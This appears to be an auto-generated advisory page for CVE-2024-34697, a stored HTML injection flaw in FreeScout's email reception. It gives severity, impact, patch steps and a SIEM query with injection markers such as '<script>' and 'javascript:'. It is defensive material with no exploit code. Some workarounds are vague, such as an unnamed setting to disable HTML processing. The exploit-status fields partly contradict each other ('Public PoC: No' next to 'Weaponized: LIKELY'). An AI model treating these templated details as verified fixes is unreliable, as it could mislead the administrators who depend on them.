CVE-2024-34697 – A stored HTML injection vulnerability in FreeSc... (How to Fix)

Q: What is the severity of CVE-2024-34697?

CVE-2024-34697 has a CVSS score of 7.6 (HIGH). A stored HTML injection vulnerability in FreeScout's email reception module allows unauthenticated attackers to inject malicious HTML content into emails processed by the application. This affects all FreeScout instances below version 1.8.139 that receive external emails. Attackers can embed malicious HTML that executes in the context of the application's domain.

📋 TL;DR

A stored HTML injection vulnerability in FreeScout's email reception module allows unauthenticated attackers to inject malicious HTML content into emails processed by the application. This affects all FreeScout instances below version 1.8.139 that receive external emails. Attackers can embed malicious HTML that executes in the context of the application's domain.

💻 Affected Systems

Products:

FreeScout

Versions: All versions before 1.8.139

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects instances that receive emails from external sources. Internal-only email systems are less exposed.

📦 What is this software?

Freescout by Freescout

View all CVEs affecting Freescout →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could perform form hijacking to steal user credentials, deface the application interface, or exfiltrate sensitive data via CSS injection techniques.

🟠

Likely Case

Attackers inject malicious HTML that creates phishing forms or redirects users to malicious sites, potentially compromising user accounts and sensitive help desk data.

🟢

If Mitigated

With proper input validation and sanitization, HTML content is neutralized and rendered as plain text, preventing any malicious execution.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires sending specially crafted emails to the FreeScout instance. No authentication needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.8.139

Vendor Advisory: https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-985r-6qfc-hg8m

Restart Required: Yes

Instructions:

1. Backup your FreeScout instance and database. 2. Update to version 1.8.139 via the built-in updater or manual installation. 3. Restart the web server and any related services. 4. Verify the update completed successfully.

🔧 Temporary Workarounds

Disable HTML email processing

all

Configure FreeScout to process emails as plain text only, stripping all HTML content

Edit FreeScout configuration to set HTML processing to disabled

Email filtering at gateway

all

Implement external email filtering to strip HTML from incoming emails before they reach FreeScout

🧯 If You Can't Patch

Implement strict Content Security Policy (CSP) headers to restrict inline scripts and styles
Monitor incoming email logs for suspicious HTML patterns and block malicious senders

🔍 How to Verify

Check if Vulnerable:

Check your FreeScout version in the admin panel or via the application's about page. If version is below 1.8.139, you are vulnerable.

Check Version:

Check the version displayed in the FreeScout admin interface or examine the application files for version information

Verify Fix Applied:

After updating to 1.8.139, test by sending an email with HTML content to your FreeScout instance and verify it's properly sanitized in the interface.

📡 Detection & Monitoring

Log Indicators:

Unusual HTML patterns in email processing logs
Multiple failed email parsing attempts with complex HTML

Network Indicators:

Incoming emails with suspicious HTML content patterns
Unusual email sources sending HTML-heavy messages

SIEM Query:

source="freescout-logs" AND (message="email processing" OR message="HTML content") AND (content="<script>" OR content="javascript:" OR content="onclick=")

📊 Metadata

CVE ID: CVE-2024-34697

CVSS v3 Score: 7.6 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

CWE: CWE-74

Published: May 14, 2024

Last Updated: January 10, 2025

🔗 References

https://github.com/freescout-helpdesk/freescout/commit/99a4b4b4e153c82e273e549b9efbf6db4a2d8328 Patch
https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-985r-6qfc-hg8m Exploit,Vendor Advisory
https://github.com/freescout-helpdesk/freescout/commit/99a4b4b4e153c82e273e549b9efbf6db4a2d8328 Patch
https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-985r-6qfc-hg8m Exploit,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-34697, you might also want to check these: